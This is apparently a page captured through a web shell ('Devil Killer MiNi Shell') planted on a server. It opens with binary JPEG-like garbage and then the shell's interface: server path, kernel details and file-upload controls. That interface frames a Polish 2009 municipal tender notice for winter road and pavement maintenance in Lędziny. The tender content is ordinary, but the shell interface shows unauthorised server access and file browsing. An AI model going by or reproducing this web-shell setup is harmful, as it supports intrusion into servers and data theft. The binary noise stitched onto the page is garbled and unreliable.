JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091006/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091006/170083-N-2009.html

<p class="kh_header"><b>Lędziny: ZIMOWE UTRZYMANIE DRÓG I CHODNIKÓW   GMINNYCH 
                     NA TERENIE MIASTA  LĘDZINY  w 2010 ROKU</b><br>
<b>Numer ogłoszenia: 170083 - 2009; data zamieszczenia: 06.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Lędziny , ul. Lędzińska 55, 43-143 Lędziny, woj. śląskie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ledziny.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZIMOWE UTRZYMANIE DRÓG I CHODNIKÓW   GMINNYCH 
                     NA TERENIE MIASTA  LĘDZINY  w 2010 ROKU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zimowe utrzymanie dróg i chodników GMINNYCH na terenie miasta LĘDZINY w roku  2010.
 
1. WSTĘP.

Przedmiotem niniejszej specyfikacji są wymagania dotyczące wykonania i sposobu prowadzenia Akcji Zima na drogach gminnych  na terenie miasta Lędziny.
Przystępując do przetargu, a w późniejszym czasie do realizacji zadania należy spełniać wszystkie wymogi i zalecenia niniejszej specyfikacji. 
Każdorazowe odstępstwo lub niespełnienie któregoś z warunków powoduje naliczenie (zgodnie z umową) odpowiednich kar pieniężnych.

2. Materiały.

Zleceniodawca musi zaakceptować wszystkie materiały i technologie, jakimi będą wykonywane prace.
W razie występowania podejrzeń, co do jakości stosowanych materiałów i sprzętu, Wykonawca wykona na własny koszt niezbędne badania i przedstawi ich wyniki zleceniobiorcy w celu akceptacji.

2.1. Materiały uszorstniające (do uszorstniania lodu, zlodowaciałego i ubitego śniegu).

Materiały uszorstniające stosowane do posypywania nawierzchni w zimowym utrzymaniu dróg powinny spełniać następujące podstawowe wymagania:
zapewniać zakładany współczynnik tarcia na nawierzchni,
nie być toksyczne i szkodliwe dla środowiska,
nie powodować zniszczeń nawierzchni i pojazdów,
dać się łatwo rozsypywać na nawierzchni,
i powinny charakteryzować się następującymi parametrami:
uziarnienie powinno być w miarę jednolite, wielkość ziaren powinna zawierać się pomiędzy 1-4mm,
zawartość ziaren drobnych (<0,075mm) powinna być minimalna (max do 3%),
ziarna nie mogą być spłaszczone i muszą mieć kształt regularny,
materiały uszorstniające powinny wykazywać dostateczną wytrzymałość na mechaniczne niszczenie przez ruch, nie mogą ulegać rozdrabnianiu,
powinny być dostarczane i składowane w stanie suchym,
Do uszorstniania mogą być stosowane następujące materiały: piasek, żwir, grys, jednak tylko wtedy gdy spełniają wymagania odpowiednich norm.

2.2. Środki chemiczne.

Do usuwania i łagodzenia skutków śliskości zimowej należy stosować następujące środki chemiczne:
1.sól (NaCl) wg PN-86/C-84081/02,
2.Chlorek Wapnia techniczny PN-75/C-84127
3.Solanka BN-86/6011-07
Dobór materiałów i ich wydatki jednostkowe do usuwania śliskości należy dobrać w zależności od panujących warunków pogodowych oraz typu występującej lub spodziewanej śliskości.


2.3. Przygotowanie i składowanie materiałów do usuwania śliskości zimowej.

Materiały stosowane do usuwania śliskości zimowej powinny być składowane w specjalnie do tego przygotowanych magazynach stałych lub tymczasowych.
Środki chemicznie, głównie chlorek sodu (NaCl) w stanie luźnym musi by składowany w magazynach zamkniętych, pozostałe środki chemiczne stosowane do likwidowania śliskości należy składować zgodnie z instrukcją magazynową.
Materiały uszorstniające z dodatkiem środków chemicznych lub same materiały uszorstniające powinny być składowane w przykrywanych pryzmach.

2.4. Odpowiedzialność za stosowanie materiałów niezgodnych z normami.

Całkowita odpowiedzialność ciąży na Wykonawcy robót. W przypadku stwierdzenia przez urząd miasta, że Wykonawca stosuje materiały niezgodne ze specyfikacja lub uzgodnieniami, obciąży się wykonawcę karami zgodnie z umowa, aż do zerwania umowy włącznie.

3. Sprzęt.

Po przeprowadzonym przetargu Zleceniodawca może przeprowadzić kontrolę wymaganego w specyfikacji sprzętu, którego brak lub niewłaściwe parametry spowodują odrzucenie oferty.

3.1. Przygotowanie sprzętu.

Sprzęt powinien być przygotowany w takim stopniu, aby mógł być gotowy do użycia w ciągu 2 godzin od chwili powołania Akcji Zima.
Na każde żądanie Zleceniodawcy, należy przedstawić posiadany sprzęt, a w razie występowania podejrzeń, co do jakości i sprawności sprzętu, Wykonawca wykona na własny koszt niezbędne badania i przedstawi ich wyniki zleceniobiorcy w celu akceptacji. Jeżeli okaże się, że sprzęt nie spełnia stawianych mu wymogów należy niezwłocznie dokonać odpowiednich napraw bądź wymiany wadliwego sprzętu.

3.2. Sprzęt do odśnieżania i likwidowania śliskości.

Wykonawca musi posiadać następujący sprzęt:
A. Drogi wraz z zatokami autobusowymi:
a)min. dwa zestawy sprzętowe do odśnieżania dróg - każdy zestaw sprzętowy musi posiadać pług, a jeden z nich dodatkowo  rozsypywarkę do likwidowania śliskości,
b)min. jeden zestaw do udrażniania dróg  i odwozu zalęgającego śniegu -  zestaw musi posiadać spycharkę oraz samochód samowyładowczy.
B. Chodniki:
a)min. 1 pojazd mechaniczny wyposażony w pług do odśnieżania chodników, o maksymalnej masie 600kg plus brygada składająca się min. z 3 pracowników do bieżącego odśnieżania terenu w pobliżu centrum. 
b)Zamontowane pługi mają umożliwiać odśnieżanie także zawężonych chodników o szerokości  1m . Pługi nie mogą uszkadzać nawierzchni chodnika, krawężników itd. 

Podstawowe parametry technologiczne, jakie rozsypywarka ma zapewnić, to zakładany: wydatek jednostkowy rozsypywanego materiału, szerokość rozsypywania oraz równomierność rozsypywania.
Do rozsypywania środków chemicznych należy używać rozsypywarek dających gwarancje ich rozsypywania z wydatkiem jednostkowym 5 do 30 g/m2, a materiałów uszorstniających  lub ich mieszanin ze środkami chemicznymi z wydatkiem jednostkowym od 50 do 150 g/m2. 
Rozrzut środków chemicznych na jezdnię sprzętem mechanicznym nie może przekroczyć 0,9 szerokości jezdni.

3.3. Środki łączności.
Każdy zestaw do odśnieżania jak i koordynator od strony Wykonawcy powinien posiadać telefon komórkowy w celu szybkiej łączności z koordynatorem Akcji Zima. Numery powyższych telefonów powinny stanowić załącznik do oferty przetargowej.
4. Zasady prowadzenia Akcji  Zima.
Przedmiotem zamówienia jest realizacja zadania pn. (Zimowe utrzymanie dróg i chodników powiatowych na terenie miasta Lędziny w roku 2010), obejmującego swym zakresem wskazane drogi, chodniki, zatoki autobusowe.
Akcji Zima prowadzona będzie od 01.01.2010r.15.03.2010 od 01.11.2010r do 31 grudnia 2010r, z tym ze okresy te mogą ulec zmianie w zależności od warunków atmosferycznych. 

Zimowe utrzymanie prowadzone i rozliczane będzie w trzech trybach: czynnym, biernym i oczekujący.
4.1. TRYB CZYNNY (opady śniegu) obejmuje swym zakresem mechaniczne usuwanie śniegu z jezdni, parkingów i placów oraz mechaniczne i ręczne usuwanie śniegu z chodników i schodów.
W przypadku opadów ciągłych wykonawca wykonuje w ciągu doby min. 4-krotne odśnieżanie wszystkich dróg i chodników oraz min. 2-krotne posypywanie wskazanych dróg i chodników oraz pozostałych dróg i chodników w przypadku wystąpienia oblodzenia uniemożliwiającego bezpieczne poruszanie się po drogach.
O zaliczenie doby do trybu czynnego decyduje opad śniegu, którego warstwa po ustaniu opadów będzie wynosi min. 5 cm. 
Wykonawca jest odpowiedzialny do utrzymania dróg i chodników w należytym stanie, tak aby były zachowane warunki bezpiecznego poruszania się po nich ludzi i pojazdów. 
Ustala się maksymalny czas reakcji (przystąpienia do pracy) 30 minut od wezwania Zamawiającego.
Dobę prowadzenia akcji czynnej lub biernej liczymy od godz. 0:00 do 23:59, a decyzja o zaliczeniu poprzedniej doby do trybu biernego, czy też czynnego nastąpi po złożeniu raportu z ubiegłej doby.
Spośród pracowników UM będzie powołany koordynator zimowego utrzymania. Do jego zadań nie będzie jednak należało ( wzywanie do rozpoczęcia trybu czynnego lub biernego) gdyż zakładamy, że zaliczenie doby do trybu czynnego lub biernego  następowac będzie ok. godz. 10:00 następnego dnia po przeanalizowaniu raportu składanego przez Wykonawcę oraz warunków panujących na drogach w czasie przedmiotowej doby. Wyjątkiem są tu weekendowe doby, które analizowane będą dopiero w poniedziałek w czasie pracy urzędu.
Odśnieżanie dróg ma na celu usunięcie śniegu z jezdni i poboczy dróg. Do odśnieżania używa się opłużonych pojazdów samochodowych, równiarek, spycharek oraz innych maszyn i nośników przystosowanych do tych prac.
Zakres prac prowadzonych przy odśnieżaniu dróg oraz technologia robót wynikają z aktualnie obowiązujących standardów utrzymania dróg.
Gdy występują opady śniegu lub zjawiska powodujące śliskość (gołoledź, lodowica, śliskość pośniegowa itp.), wykonawca zapewnia min. 2 zestawy sprzętowe do odśnieżania, a w czasie intensywnych opadów śniegu wymagane są dodatkowo dwa ciężkie zestawy do udrażniania dróg (spycharko - ładowarki z samochodami samowyładowczymi).

Drogi odśnieżane w pierwszej kolejności.

Droga powinna być odśnieżona na całej szerokości, natomiast na skrzyżowaniach, ostrych zakrętach i pozostałych miejscach niebezpiecznych, dodatkowo należy usunąć zjawiska powodujące śliskość.

Do miejsc szczególnie niebezpiecznych zaliczamy takie skrzyżowania i odcinki dróg : 
a)Skrzyżowanie ul. Murckowskiej  z Gwarków
b)Skrzyżowanie ul. Hołdunowskiej  z Fredry
c)Skrzyżowanie ul. Hołdunowskiej  z Ułańską
d)Skrzyżowanie ul. Lędzińskiej  z Pokoju
e)Skrzyżowanie ul. Lędzińskiej  z Jagiellońską
f)Skrzyżowanie ul. Goławieckiej  z Szenwalda
g)Skrzyżowanie ul. Wygody z Kontnego
h)Odcinek ul. Lędzińskiej na wysokości Ronda
i)Odcinek ul. Murckowskiej przy wiadukcie na S1
j)ul. Wygody  na łukach

Do kalkulacji proszę przyjąć odcinki po  50 mb na każdym z wlotów na skrzyżowanie.
Do kalkulacji i późniejszego utrzymania proszę przyjąć dla każdego z zakrętów odcinek min. 150 mb. które to utrzymujemy w sposób zapewniający bezpieczne poruszanie się pieszych i zmotoryzowanych.

W pierwszej kolejności powinny być odśnieżone ulice: Szenwalda, Jagiellońska, Hołdunowska, Lędzińska, Pokoju, Oficerska, Wygody, Kontnego, Zamoście, Zamkowa, Gwarków, Murckowska, Ułańska, Goławiecka, Ziemowita, Dzikowa, Zawiszy Czarnego.
Na powyższych ulicach dopuszcza się możliwość wystąpienia gołoledzi do 5 godzin, śniegu i błota pośniegowego do 6 godzin po ustaniu występowania powyższych zjawisk.

4.1.2.  Utrzymanie chodników, przystanków autobusowych, parkingów i placów.
Do bieżącego odśnieżania terenu w pobliżu centrum przystępuje brygada składająca się min. z czterech pracowników.
Przystanki autobusowe, zatoki i chodniki powinny być odśnieżone do 3 godzin.
Dodatkowo należy oczyścić z zalegającego śniegu (między chodnikiem, a jezdnią) wszystkie przejścia dla pieszych. 
Niezależnie od tego, wszystkie przystanki autobusowe, schody i chodniki w centrum miasta powinny być odśnieżone i doprowadzone do należytego stanu już o godzinie 600.

Jako centrum rozumiemy chodniki przy ulicach: Lędzińskiej, Hołdunowskiej, Pokoju, Fredry. Dodatkowo w tej grupie należy ująć chodnik pod ośrodkami zdrowia, szkołami i przedszkolami.
Chodniki te powinny być odśnieżone i posypane solą.
4.1.3. Odśnieżanie miejsc trudno dostępnych.
Przy barierach, zatokach autobusowych, parkingach do odśnieżania używać ładowarek lub usuwać śnieg ręcznie.
Prace te można wykonywać po zakończeniu innych prac, za wyjątkiem odśnieżania zatok autobusowych, które muszą być odśnieżone w trakcie prowadzenia odśnieżania na drodze.
Śnieg zalegający na zatoce autobusowej powinien być w całości wywieziony lub zepchnięty w miejsce nie utrudniające ruchu pieszym i zmotoryzowanym. 
Części przykrawężnikowe jezdni oraz studzienki kanalizacyjne powinny być oczyszczone ze śniegu i lodu w stopniu umożliwiającym spływ wody powstałej z topniejącego śniegu.

4.1.4. Wywożenie śniegu.

W przypadku zalegania dużych ilości śniegu uniemożliwiających poruszanie się pojazdów i pieszych Wykonawca na każde żądanie Zamawiającego wywiezie zalegający śnieg i błoto pośniegowe na działkę gminną przy ul. Fredry obok bazy firmy (EKOREC) Sp. z o.o. oraz na terenach miejskich przy  ul. Stadionowej .

4.2. TRYBY BIERNY (brak opadów śniegu) obejmuje swym zakresem:
a)likwidację śliskości na drogach, chodnikach, zatokach i miejscach postojowych. 
b)mechaniczne usuwanie śniegu i błota pośniegowego z jezdni, parkingów, placów oraz chodników i schodów. 
c)utrzymanie w gotowości sprzętu i ludzi.
Tryb bierny rozliczany będzie w oparciu o stawkę prowadzenia 1 doby czynnej Akcji Zima. Jako zapłatę za 1 dobę w trybie biernym  przyjmować będziemy  20%  kwoty za 1 dobę trybu czynnego.

W trybie biernym obowiązują te same zasady, kolejność, terminy i zakresy robót jak te wymienione w trybie prowadzenia czynnej akcji zima, z tym, że w tym przypadku prace polegają głównie na usuwaniu błota pośniegowego i likwidacji śliskości. 
Dodatkowo podczas trybu biernego zlecane będą prace (czyszczenie kratek z zalegającego śniegu, wywożenie śniegu itp.), które mogą być konieczne w celu zapewnienia bezpiecznego korzystania z dróg i chodników.

4.3  TRYBY OCZEKIWANIA w przypadku:
-  braku opadów śniegu,
-  braku śliskości na drogach, chodnikach, zatokach i miejscach postojowych,
obejmuje swym zakresem utrzymanie w gotowości sprzętu i ludzi.
Tryb oczekiwania rozliczany będzie w oparciu o stawkę prowadzenia 1 doby czynnej Akcji Zima. Jako zapłatę za 1 dobę w trybie oczekiwania  przyjmować będziemy  2%  kwoty za 1 dobę trybu czynnego.

5. 	Zasady odbioru robót zimowego utrzymania dróg.
Codziennie do godz. 1000 Wykonawca składa raport z prowadzonej Akcji Zima za ubiegła dobę.
Ustala się miesięczny okres rozliczenia robót. Do każdego rozliczenia miesięcznego Wykonawca przedłoży  meldunki/raporty z miesięcznego okresu prowadzenia Akcji Zima oraz protokół odbioru robót potwierdzony przez koordynatora.
Powyższe raporty, jak i warunki atmosferyczne panujące w czasie poprzedniej doby będą podstawą do zaliczenia doby do danego trybu oraz do późniejszych rozliczeń.
Karty pracy prowadzi Wykonawca, notując w nich kolejne wyjazdy wynikające ze specyfikacji oraz wyjazdy interwencyjne zlecone przez koordynatora.
Karta zawiera krótki opis miejsca wyjazdu (zakres), godzinę wyjazdu oraz czas pracy sprzętu i ludzi.
Zamawiający zastrzega sobie prawo do wglądu w dzienniki pracy sprzętu i w karty drogowe Wykonawcy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-6, 90.63.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.W postępowaniu mogą wziąć udział wykonawcy, którzy:
1.1. posiadają uprawnienia do wykonania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
1.2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia;
1.3. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
1.4. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego zgodnie z art. 24 ust. 1 i 2 ustawy.
2.Zamawiający ustala następujące szczegółowe warunki udziału w postępowaniu:
2.1. W zakresie warunku wskazanego w ust. 1 pkt 1.2 wymagane jest posiadanie niezbędnej wiedzy i doświadczenia w zakresie realizacji minimum dwóch usług w okresie trzech lat przed wszczęciem postępowania, a jeżeli okres prowadzonej działalności jest krótszy w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania   oraz dokumentów potwierdzających, że roboty zostały wykonane z należytą starannością (§ 6 ust.3 pkt 3.1 ) załącznik Nr 4.
3.  Zamawiający przy ocenie spełnienia warunków udziału w postępowaniu zastosuje formułę spełnia/nie spełnia. Nie spełnienie chociażby jednego z w/w warunków skutkować będzie wykluczeniem wykonawcy z postępowania o udzielenie zamówienia w oparciu o przesłanki zawarte w art. 24 ustawy. 
4.  Ofertę wykonawcy wykluczonego uzna się za odrzuconą zgodnie z treścią art. 24 ust. 4 	ustawy. 
3.Posiada   niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i  osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych  podmiotów do udostępnienia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Sporządzony przez Wykonawcę według załącznika  Nr 1 do siwz Formularz Ogólny Oferty.
2.W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonania określonej    działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy zawartych w § 5 ust. 1 pkt. 1.1 siwz, Zamawiający  żąda:
2.1.  Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. W przypadku oferty składanej wspólnie przez kilku Wykonawców, każdy Wykonawca składa wyżej wymieniony dokument odrębnie.
2.2. Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego lub Kasy  Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie , że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu-wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. W przypadku oferty składanej wspólnie przez kilku Wykonawców, każdy Wykonawca składa wyżej wymieniony dokument odrębnie, wspólnicy spółki cywilnej-odrębnie i dodatkowo na spółkę cywilną.
3.W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, zawartych w §5 ust. 1 pkt. 1.2 SIWZ, Zamawiający żąda:
3.1. Wykaz (na zał. Nr 4 do SIWZ lub dokumencie zgodnym z treścią załącznika) wykonanych dwóch usług w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia.
4.W celu potwierdzenia opisanego przez Zamawiającego warunku znajdowania się przez Wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, zawartego w §5 ust. 1 pkt. 1.3 SIWZ. Zamawiający żąda:
4.1.Posiadania  polisy  od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż  50 000,00 zł.
W przypadku podmiotów składających ofertę wspólną wymóg ubezpieczenia od odpowiedzialności cywilnej dotyczy firm, których oferta łącznie spełnia wymagania Zamawiającego w kwocie nie mniejszej niż    50 000,00 zł.
5.Dokumenty należy złożyć w formie oryginału lub kopii  poświadczonej za zgodność z oryginałem przez Wykonawcę.
5.1. Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej  kopii dokumentu wyłącznie wtedy, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna  lub budzi wątpliwości co do jej prawdziwości,
5.2. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski,  poświadczonym przez Wykonawcę. Tłumaczenie nie jest wymagane, jeśli  Zamawiający wyraził zgodę, w szczególnie uzasadnionych przypadkach na złożenie wniosku o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia, oświadczeń , ofert oraz  innych dokumentów również w języku kraju, w którym zamówienie jest udzielone.
6. Pełnomocnictwo do podpisywania oferty i składania ewentualnych wyjaśnień, jeżeli osobą podpisującą  nie jest osoba upoważniona na podstawie dokumentu wymienionego w pkt.1.1 - w oryginale lub poświadczone notarialnie lub opatrzone adnotacją /za zgodność z oryginałem/ pieczęcią Wykonawcy, imienną pieczątką osoby upoważnionej na podstawie dokumentu wymienionego w pkt. 1.1 oraz jej podpisem.
7. Oświadczenie o spełnieniu warunków udziału w postępowaniu na podstawie art. 44 i nie podleganiu wykluczeniu  z art. 24 ust. 1 i 2 ( w przypadku oferty składanej wspólnie przez kilku Wykonawców, oświadczenie składa każdy Wykonawca) załącznik Nr 2 do siwz.
8. Zamawiający wezwie wykonawców,  którzy w wyznaczonym terminie nie złożyli oświadczeń lub dokumentów o których mowa w art. 25 ust. 1 ustawy, lub którzy złożyli dokumenty o których mowa w art. 25 ust.1 ustawy zawierające błędy, do ich uzupełnienia w wyznaczonym terminie, chyba że mimo ich uzupełnienia oferta wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania (art. 26 ust. 3 ustawy).
9. Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Dokument potwierdzający ustanowienie pełnomocnika powinien zawierać wskazanie postępowania o zamówienie publiczne, którego dotyczy, wykonawców ubiegających się wspólnie o udzielenie zamówienia, ustanowionego pełnomocnika oraz zakres jego umocowania także oświadczenie o przyjęciu wspólnej solidarnej odpowiedzialności za wykonanie lub nienależyte wykonanie zamówienia. Podpisany przez wszystkich Wykonawców ubiegających się wspólnie o zamówienie publiczne. Podpisy muszą zostać złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub wpisie do ewidencji działalności gospodarczej. Dokument pełnomocnika należy przedstawić w formie oryginału. Zaleca się wyczerpać zobowiązanie skarbowe do ustanowionego pełnomocnictwa. Rozliczenie to Zamawiający  uzna za wypełnione, jeżeli data wystawienia pełnomocnictwa będzie w terminie do którego Wykonawca jest zobowiązany przedstawić zaświadczenie od właściwego naczelnika urzędu skarbowego o którym mowa w ust.1 pkt. 1.1. Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem występującym jako pełnomocnik.
10. Jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana, Zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
